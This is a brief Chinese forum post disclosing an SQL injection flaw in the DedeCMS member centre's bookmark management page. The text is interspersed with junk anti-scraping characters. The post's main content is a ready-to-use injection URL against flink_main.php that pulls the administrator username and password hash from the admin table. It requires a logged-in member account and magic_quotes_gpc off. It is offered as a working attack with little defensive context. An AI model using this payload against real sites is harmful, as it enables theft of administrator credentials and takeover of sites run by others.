DedeCMS会员中心SQL注射漏洞' W. [% i3 B! h; x
需要magic_quotes_gpc = Off
4 G( F4 y" D& ?# K/ v' ?会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
( z- I7 U6 q2 S9 C: C- s: v8 } # ^- U/ W' h, R
DedeCMS会员中心书签管理SQL注射漏洞
1 Y! e3 k% ~, k, e9 S# _( Q成功利用该漏洞可获得管理员密码
( D: y. v6 t# R* F# V& ]
8 U9 f* n5 W/ q0 G" r会员登录后可以执行SQL语句查询数据库任意内容如管理员密码6 H- C( L4 d' A( ~8 S5 \
' q$ F @! q1 {0 C; q
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
9 D* h4 F$ Z/ P3 n |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59